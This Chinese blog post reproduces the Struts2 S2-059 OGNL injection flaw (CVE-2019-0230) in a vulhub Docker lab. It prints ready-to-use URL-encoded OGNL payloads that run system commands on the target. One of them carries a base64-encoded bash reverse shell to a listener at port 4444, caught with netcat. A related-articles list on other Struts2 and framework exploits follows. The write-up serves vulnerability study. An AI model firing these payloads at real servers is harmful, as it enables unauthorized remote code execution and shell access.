s2-059

最新推荐文章于 2024-07-26 11:42:28 发布
最新推荐文章于 2024-07-26 11:42:28 发布
阅读量223 收藏
点赞数
文章标签: 安全 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_65722679/article/details/131495453
版权

环境搭建

docker-compose up -d		//启动环境
docker-compose ps -a		//查看状态

7863c53db970b36def5c27ebae13680.png
f7fbbb9c9c255c29361263f83773c59.png

浏览访问

靶机ip+分配端口
image.png

漏洞验证

http://ip:8080/?id=漏洞点
做一个简单的计算,看会不会执行,只要执行了,那么漏洞就存在

poc,拼接访问
/index.action?id=%25{(223*223)}

image.png

右键查看源代码

参数被执行,漏洞存在
image.png

再次访问页面,bp抓包

get方式传参,发送repeater

image.png

poc1,在/tmp目录下创建PowerShell.txt文件

因为是没有回显的,所以我们创建一个文件,直接在exec后面接touch /tmp/PowerShell.txt就行,记得要进行url编码。

%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('命令'))}

构造及url编码后(该命令可直接使用)
%25%7B(%23context%3D%23attr%5B'struts.valueStack'%5D.context).(%23context.setMemberAccess(%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS)).(%40java.lang.Runtime%40getRuntime().exec('touch%20%2Ftmp%2FPowerShell.txt'))%7D

image.png

进入容器查看

docker ps -a		//可以查看容器id
docker exec -it 容器ID /bin/bash			//进入容器

image.png

构造请求包执行POC2

生成监听机的反弹shell命令
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjY2LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}

url编码
bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjEwLjY2LzQ0NDQgMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D

构造payload(把反弹shell的命令生成编码好,在此命令上拼接)
%25%7B(%23context%3D%23attr%5B'struts.valueStack'%5D.context).(%23context.setMemberAccess(%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS)).(%40java.lang.Runtime%40getRuntime().exec('反弹shell命令'))%7D

构造好的payload
%25%7B(%23context%3D%23attr%5B'struts.valueStack'%5D.context).(%23context.setMemberAccess(%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS)).(%40java.lang.Runtime%40getRuntime().exec('bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjEwLjY2LzQ0NDQgMD4mMQ%3D%3D%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D'))%7D

kali监听机开启监听

nc -lvnp 4444

image.png

bp发送poc2的包

image.png

getshell

image.png

参考文章

https://www.syrr.cn/news/2376.html?action=onClick

默ran
关注
[渗透测试笔记] 45.struct2/s2-059漏洞复现
H4ppyD0g的博客
03-14 1117
文章目录漏洞描述漏洞原理漏洞复现 漏洞描述 Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 漏洞原理 OGNL是Object Graphic Navigation Language(对象图导航语言)的缩写。Struts2框架使用OGNL作为默认的表达式语言。 OGNL作用:取值,获取javaBean中的属性,获取List或者数组元素,获得Map的键值对,还
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059(CVE-2019-0230)
qq_51577576的博客
12-14 855
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-059(CVE-2019-0230) 漏洞产生的主要原因是因为Apache Struts框架在强制执行时,会对分配给某些标签属性(如id)的属性值执行二次ognl解析。攻击者可以通过构造恶意的OGNL表达式,并将其设置到可被外部输入进行修改,且会执行OGNL表达式的Struts2标签的属性值,引发OGNL表达式解析,最终造成远程代码执行的影响。
s2-059漏洞复现
Birdman-one的博客
12-11 1481
s2-059 Struts2介绍 是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控
CVE-2019-0230:CVE-2019-0230和S2-059 POC
03-10
CVE-2019-0230 CVE-2019-0230和s2-059 poc
Struts2 S2-059漏洞复现-命令执行
帅醉了的博客
11-03 2777
Struts2 S2-059漏洞复现-命令执行 http://192.168.202.133:8080/?id=1把id=改成%25%7B233*233%7D 验证完毕 测试命令执行
S2-057,S2-059,s2-061,s2-062漏洞复现
xiaobai_20190815的博客
04-12 3379
一、漏洞描述 当Struts2的标签属性值引用了action对象的参数值时,便会出现OGNL表达式的二次解析,从而产生RCE风险(S2-059的修复方式为只修复了沙盒绕过并没有修复OGNL表达式执行点,因为这个表达式执行触发条件过于苛刻,导致S2-061再次绕过了S2-059的沙盒) 二、影响版本 s2-057:<=Struts 2.3.34,Struts 2.5.16 s2-059:Struts 2.0.0 - Struts 2.5.20 s2-061:Struts 2.0.0-Strut
CVE-2019-0230 s2-059 漏洞分析1
08-03
CVE-2019-0230 s2-059 漏洞分析 Apache Struts 框架中的 CVE-2019-0230 漏洞是远程代码执行(RCE)漏洞,影响范围为 Struts 2.0.0 - Struts 2.5.20。官方建议升级到 2.5.22 或更高版本。该漏洞的成因是 Struts 框架...
Struts2 S2-059 远程代码执行漏洞(CVE-2019-0230 )复现
玄道的网安博客
10-28 2090
简介 Struts2是一个基于MVC设计模式的Web应用框架 影响版本 Struts 2.0.0 – Struts 2.5.20 环境搭建 使用vulhub快速搭建 https://github.com/vulhub/vulhub 进入目录 cd vulhub-master/struts2/s2-059 docker安装 docker-compose up -d 启动环境之后访问http://your-ip:8080/?id=1就可以看到测试界面 漏洞...
Struts2 S2-059 远程代码执行漏洞复现
m0_48520508的博客
11-17 1596
0x00简介 Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序,它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程
[旧文系列] Struts2历史高危漏洞系列-part6:S2-059/S2-061
mole_exp的博客
01-18 1642
文章目录关于<旧文系列>前言S2-059漏洞复现与分析可回显PoC漏洞修复S2-061漏洞复现与分析可回显PoC漏洞修复小结Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 https://forum.butian.net
WEB漏洞集合
10-08
常见的网站漏洞集合,利用代码、利用工具以及漏洞的技术分析
网络安全深入学习第二课——热门框架漏洞(RCE—Thinkphp5.0.23 代码执行)
p36273的博客
09-16 1763
简言之,别人帮你建好了房子但尚未装修,你需要在别人设计好的户型里去装修,省去你搬砖的重复性操作。------ ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列,各个系列之间在代码实现及功能方面,有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护,ThinkPHP 5系列现使用最多,而ThinkPHP 3系列也积累了较多的历史用户。
【vulhub】Struts2 S2-059 远程代码执行漏洞(CVE-2019-0230)
weixin_42884199的博客
12-07 1310
前言 Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 影响版本: Struts 2.0.0 - Struts 2.5.20 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload view-source:http://192.168.150.146:8080/index.action?i
Struts2-059 远程代码执行漏洞(CVE-2019-0230)分析
weixin_46236101的博客
10-14 4205
前言 2020年8月13日虽然近几年来关于ONGL方面的漏洞已经不多了,但是毕竟是经典系列的RCE漏洞,还是有必要分析的。而且对于Struts2和OGNL了解也有助于代码审计和漏洞挖掘。 首先了解一下什么是OGNL,Object Graphic Navigation Language(对象图导航语言)的缩写,Struts框架使用OGNL作为默认的表达式语言。 struts2_S2_059和S2_029漏洞产生的原理类似,都是由于标签属性值进行二次表达式解析产生的,细微差别会在分析中提到。 漏洞利用前置条件是
apacheunomi漏洞介绍及代码分析
程序员阿飘 的博客
01-07 206
Apache Unomi具有隐私管理、用户/事件/目标跟踪、报告、访客资料管理、细分、角色、A/B测试等功能,可以作为Web CMS、个性化服务、原生移动应用的分析服务、具有分段功能的集中配置文件管理系统、授权管理中心。CVE-2020-13942是CVE-2020-11975的绕过 该漏洞描述的是Unomi针对MVEL表达式(和OGNL表达式)的未进行敏感函数的过滤,直接解析,导致任意代码执行本文主要对MVEL这条利用链做代码层面的分析。
struts2漏洞_Struts2 S2059远程代码执行漏洞(CVE20190230)
weixin_39989443的博客
12-10 329
作为一家专业的网络安全服务供应商,圣博润特别注重对最新安全漏洞的发现和追踪,以“及时性、准确性、层次性”为宗旨,为用户提供漏洞预警、通告及响应服务。一、Struts2简介Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下...
【关注观星公众号】渗透系列之POC编写之刷分大法
Websec
12-04 7645
一、前言:POC&EXP 什么是POC:即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数据的运行,对承载用户数据量和运行时间进行实际测算,并根据用户未来业务扩展的需求加大数据量以验证系统和平台的承载能力和性能变化。在信息安全里,POC为漏洞验证程序,功能为检测漏洞是否存在。poc和exp(全称Exploit)的区别就是,poc是漏洞验证程序,exp是漏洞利用程序。针对通用型应用漏洞编写poc,可
03-Weblogic漏洞
最新发布
qq_57410330的博客
07-26 1502
全名:Oracle WebLogic Server,JavaEE服务器商业产品,适用于大型商业项目同类产品:IBM WebSphere、Apache Tomcat、Redhat Jboss7001。
vulhub漏洞复现系列之struts2(s2-048、s2-052、S2-053、s2-057、s2-059)
weixin_43071873的博客
12-11 1449
本来想把struts2剩下的靶场全部打完然后写博客分享给大家,但是vulhub搭建实在是太慢了!!!无奈只能先把复现好的这几个分享出来了。 ** (CVE-2017-9791)s2-048 ** 一、漏洞简介 当实用了Struts2 Struts1 插件时,可能导致不受信任的输入传入到ActionMessage类种导致命令执行 二、影响范围 2.3.x 三、漏洞复现: 进入靶场 第一个框填入${4*4},其余两个框随意填 可以看到计算结果回显出来了 Poc: %{(#dm=@ognl.OgnlCon
深入分析CVE-2019-0230漏洞及S2-059 POC研究
当与"S2-059"和"POC"一同提及,可能意味着CVE-2019-0230与S2-059漏洞有关联,或者是在某种技术或安全背景下的一个特定案例。 "S2-059"可能是指Apache Struts2的一个特定版本中的一个已知漏洞,Apache Struts2是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值